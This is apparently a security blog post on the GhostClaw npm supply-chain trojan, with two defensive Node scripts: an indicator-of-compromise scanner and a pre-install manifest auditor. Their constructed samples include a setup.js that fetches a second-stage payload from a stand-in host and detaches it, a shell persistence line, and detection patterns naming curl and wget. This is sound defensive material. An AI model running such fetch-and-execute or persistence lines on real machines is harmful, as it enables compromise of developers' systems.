A sophisticated supply chain attack has been quietly compromising developer machines since early March 2026. A malicious npm package named @openclaw-ai/openclawai — masquerading as an installer for the legitimate OpenClaw tool — was spreading a fully-featured remote access trojan dubbed GhostClaw. It had been downloaded 178 times before being pulled from the registry on March 10, 2026.
🎭 How It Fooled Developers
The package was engineered to look trustworthy at every step. It came with a clean package.json, a benign src/index.js export, and no suspicious dependencies — the kind of profile that passes a quick audit without raising flags.
The real damage began with a postinstall hook that silently reinstalled the package globally, planting the openclaw binary on the system PATH. A file called setup.js then launched a convincing fake CLI — complete with animated progress bars — simulating a real installation.
Once the fake install “completed,” users were shown what appeared to be an iCloud Keychain authorization prompt asking for their system password. Crucially, the malware validated the password using the real OS authentication mechanism — meaning wrong passwords were rejected, making the prompt feel completely genuine.
While the user’s attention was on the fake UI, the script was simultaneously fetching an encrypted second-stage payload from a remote C2 server (trackpipe[.]dev), running it as a detached process, and immediately deleting the temp file to cover its tracks.
👻 Meet GhostLoader
The decrypted payload — roughly 11,700 lines of JavaScript — was a complete malware framework called GhostLoader. It buried itself in a hidden directory disguised as a routine npm telemetry service (~/.npm_telemetry/monitor.js) and set up persistence hooks in shell config files so it would automatically relaunch if terminated.
What it stole was staggering in scope:
- 🔑 System passwords and macOS Keychain databases
- ☁️ Cloud credentials (AWS, GCP, Azure config files)
- 🔐 SSH private keys
- 💰 Cryptocurrency wallet files and seed phrases
- 🌐 Browser credentials, cookies, and saved passwords
- 📱 iMessage history and email records
- 🪪 API tokens for OpenAI, Stripe, GitHub, and more
Perhaps the most alarming capability: live browser session cloning. Rather than just stealing credentials, the attacker could duplicate an entire browser profile and run it in a headless environment — effectively impersonating the victim in real time without ever needing a password.
The malware ran on macOS, Linux, and Windows, adapting its credential-harvesting method to each platform. Its C2 infrastructure also included a NUKE command to remotely wipe all evidence of the infection on demand.
🚨 What To Do If You Installed It
If you ran `npm install @openclaw-ai/openclawai` at any point, treat your machine as fully compromised and act immediately:
- Remove the `~/.npm_telemetry` directory
- Check `~/.zshrc`, `~/.bashrc`, and `~/.bash_profile` for injected lines
- Kill any running `monitor.js` processes
- Fully uninstall the package, including the global copy the postinstall hook created
- Rotate all credentials — system passwords, SSH keys, AWS/GCP/Azure tokens, OpenAI, Stripe, GitHub API keys, and any exposed crypto wallet seed phrases
- Consider a full machine re-image given the depth of the compromise
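The clean-up steps above can be checked mechanically before you start rotating credentials. The script below is an added example, not code from the article or from any of the cited vendors: it looks for the three indicators the article gives (the `~/.npm_telemetry` directory, `monitor.js`, and persistence lines in shell rc files) and prints the matching clean-up commands without executing them. The `SAMPLE_RC` and `SAMPLE_PS` inputs are constructed to exercise the matchers and are not captured from a real infection; `.profile` and `.zprofile` are added to the rc-file list as an assumption (they are also sourced at login but are not named in the article).

```javascript
// Added example: indicator check for the GhostLoader clean-up steps.
// Not code from the original page; samples below are constructed.
// Usage: node ghostloader-check.js --scan   (read-only; prints suggested commands)

const HOME = process.env.HOME || process.env.USERPROFILE || '';
const IOC_DIR = '.npm_telemetry';                 // hidden directory named in the article
const IOC_PATTERN = /\.npm_telemetry|monitor\.js/; // loader path fragments to look for
const PACKAGE = '@openclaw-ai/openclawai';
// The three files the article names, plus two login files (assumption, see lead-in).
const RC_FILES = ['.zshrc', '.bashrc', '.bash_profile', '.profile', '.zprofile'];

// Return the numbered lines of a shell rc file that reference the loader.
function findPersistenceLines(rcText) {
  return rcText.split('\n')
    .map((line, i) => ({ lineNo: i + 1, line: line.trim() }))
    .filter(({ line }) => IOC_PATTERN.test(line));
}

// Parse `ps axo pid=,command=` output and keep processes running the loader.
function findSuspiciousProcesses(psText) {
  const hits = [];
  for (const raw of psText.split('\n')) {
    const m = raw.trim().match(/^(\d+)\s+(.*)$/);
    if (m && IOC_PATTERN.test(m[2])) hits.push({ pid: Number(m[1]), command: m[2] });
  }
  return hits;
}

// Constructed samples (not real artefacts): one injected rc line, one loader process.
const SAMPLE_RC = [
  'export PATH="$HOME/bin:$PATH"',
  'alias ll="ls -la"',
  'nohup node "$HOME/.npm_telemetry/monitor.js" >/dev/null 2>&1 &',
].join('\n');
const SAMPLE_PS = [
  '  412 /usr/sbin/sshd',
  ' 7731 node /Users/dev/.npm_telemetry/monitor.js',
  ' 7802 node /Users/dev/project/node_modules/.bin/eslint',
].join('\n');

// Live, read-only scan of this host (macOS/Linux; ps syntax is BSD-style).
async function scanHost() {
  const fs = await import('node:fs');
  const path = await import('node:path');
  const { execFileSync } = await import('node:child_process');

  const dir = path.join(HOME, IOC_DIR);
  const dirHit = fs.existsSync(dir);
  console.log(dirHit ? `[!] ${dir} exists` : `[ok] ${dir} not present`);

  for (const rc of RC_FILES) {
    const p = path.join(HOME, rc);
    if (!fs.existsSync(p)) continue;
    for (const { lineNo, line } of findPersistenceLines(fs.readFileSync(p, 'utf8'))) {
      console.log(`[!] ${p}:${lineNo}: ${line}`);
    }
  }

  let procs = [];
  try {
    procs = findSuspiciousProcesses(execFileSync('ps', ['axo', 'pid=,command=']).toString());
  } catch {
    console.log('[?] could not run ps (on Windows use Get-Process or tasklist instead)');
  }
  for (const { pid, command } of procs) console.log(`[!] pid ${pid}: ${command}`);

  // Clean-up corresponding to the findings; printed for review, never executed here.
  console.log('\nSuggested clean-up:');
  for (const { pid } of procs) console.log(`  kill ${pid}`);
  if (dirHit) console.log(`  rm -rf ${dir}`);
  console.log(`  npm uninstall -g ${PACKAGE} && npm uninstall ${PACKAGE}`);
  console.log('  then rotate every credential listed above and consider a full re-image');
}

if (process.argv.includes('--scan')) scanHost().catch(e => console.error(e.message));
```

Kill the process before removing the directory, otherwise the rc-file hook can respawn it from a shell you open in between; and because the second stage ran with your real password, a clean indicator scan is not proof of a clean machine, which is why the re-image advice stands.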
🛡️ The Broader Lesson
This campaign is a textbook software supply chain attack — patient, polished, and designed to strike exactly when developers are most likely to trust what they’re running.
Going forward, treat any npm package as suspicious if it:
- Requests system credentials at any point
- Uses postinstall scripts to globally install itself
- Fetches remote payloads at install time
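Those three rules, plus the detached second stage and the password prompt described earlier, can be checked statically before `npm install` ever runs a lifecycle script. The following Node script is an added example (not code from the article, from JFrog's write-up, or from the OpenClaw project) that audits a package.json and the local scripts its install hooks invoke. `SAMPLE_MANIFEST` and `SAMPLE_FILES` are constructed to resemble the profile described above and are not the real package's contents; the rule names and the `auditManifest` function are this example's own.

```javascript
// Added example: static pre-install audit of an npm manifest for the
// red flags discussed above. Not code from the original page; the sample
// manifest and setup.js below are constructed for illustration only.

// Lifecycle hooks npm runs during `npm install` without asking the user.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic patterns; each hit is a reason to read the package by hand.
const RULES = [
  { rule: 'global-self-install', re: /\bnpm\s+(?:i|install|add)\b[^&|;\n]*(?:\s-g\b|--global\b)/ },
  { rule: 'remote-fetch',        re: /\b(?:curl|wget)\b|https?:\/\/|require\(['"](?:node:)?https?['"]\)|\bfetch\s*\(/ },
  { rule: 'detached-process',    re: /detached\s*:\s*true|\.unref\s*\(\)/ },
  { rule: 'credential-prompt',   re: /\b(?:password|keychain|osascript|sudo)\b/i },
];

// Local files an install command hands to node, e.g. "node setup.js" -> ["setup.js"].
function referencedScripts(cmd) {
  return [...cmd.matchAll(/\bnode\s+(?:-[^\s]+\s+)*([^\s&|;]+\.[cm]?js)\b/g)].map(m => m[1]);
}

// pkg: parsed package.json; files: { relativePath: contents } from the tarball.
// Returns a list of { rule, where, detail } findings (empty means nothing flagged).
function auditManifest(pkg, files = {}) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    findings.push({ rule: 'lifecycle-script', where: `scripts.${hook}`, detail: cmd });
    // Inspect the hook command itself and any local script it runs.
    const sources = [[`scripts.${hook}`, cmd]];
    for (const file of referencedScripts(cmd)) {
      if (files[file] !== undefined) sources.push([file, files[file]]);
      else findings.push({ rule: 'unreadable-script', where: file, detail: 'referenced but not in package' });
    }
    for (const [where, text] of sources) {
      for (const { rule, re } of RULES) {
        const m = text.match(re);
        if (m) findings.push({ rule, where, detail: m[0] });
      }
    }
  }
  // A bin entry is how a globally installed package lands on PATH.
  if (pkg.bin && Object.keys(pkg.bin).length && findings.some(f => f.rule === 'global-self-install')) {
    findings.push({ rule: 'bin-on-path', where: 'bin', detail: Object.keys(pkg.bin).join(', ') });
  }
  return findings;
}

// Constructed sample: clean-looking manifest whose postinstall reinstalls
// itself globally and runs a local setup script that fetches and detaches.
const SAMPLE_MANIFEST = {
  name: 'example-installer', version: '1.0.0', main: 'src/index.js',
  bin: { 'example-cli': 'bin/cli.js' },
  scripts: { postinstall: 'npm install -g . && node setup.js' },
  dependencies: {},
};
const SAMPLE_FILES = {
  'setup.js': [
    "const https = require('https');",
    "const { spawn } = require('child_process');",
    "https.get('https://example.invalid/stage2', () => {});",
    "spawn(process.execPath, ['/tmp/x'], { detached: true, stdio: 'ignore' }).unref();",
  ].join('\n'),
};
// Constructed sample with no install hooks at all.
const CLEAN_MANIFEST = { name: 'example-lib', version: '1.0.0', scripts: { test: 'node --test' } };

// Usage: node audit-manifest.js [path/to/package.json]; with no path, audits the sample.
async function main() {
  let pkg = SAMPLE_MANIFEST, files = SAMPLE_FILES;
  const target = process.argv[2];
  if (target) {
    const fs = await import('node:fs');
    const path = await import('node:path');
    pkg = JSON.parse(fs.readFileSync(target, 'utf8'));
    files = {};
    const dir = path.dirname(target);
    for (const hook of INSTALL_HOOKS) {
      for (const f of referencedScripts((pkg.scripts || {})[hook] || '')) {
        const p = path.join(dir, f);
        if (fs.existsSync(p)) files[f] = fs.readFileSync(p, 'utf8');
      }
    }
  }
  for (const f of auditManifest(pkg, files)) console.log(`${f.rule.padEnd(20)} ${f.where}: ${f.detail}`);
}
main().catch(e => console.error(e.message));
```

Fetch the tarball with `npm pack <package>` and unpack it, then point the script at the extracted package.json; anything that trips a rule should be read by hand, and `npm install --ignore-scripts` keeps lifecycle hooks from running while you look. These are heuristics: an unobfuscated sample like the one above is easy to flag, and a minified or string-built second stage will not be, so the check complements rather than replaces verifying that you are installing the official package.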
When installing OpenClaw or any developer tool, always verify you’re using the official package from confirmed, trusted sources.
Sources: JFrog Security, The Hacker News, Cyber Security News, CSO Online, SOCRadar
Tags: #CyberSecurity #npm #SupplyChainAttack #Malware #DevSecurity
Thanmay Sarath is a Mensa member, ethical hacker, entrepreneur, and technologist passionate about cybersecurity and innovation. A researcher, international speaker, and published author, he works at the intersection of technology, security, and social impact, helping organizations and communities stay safe in an increasingly digital world.
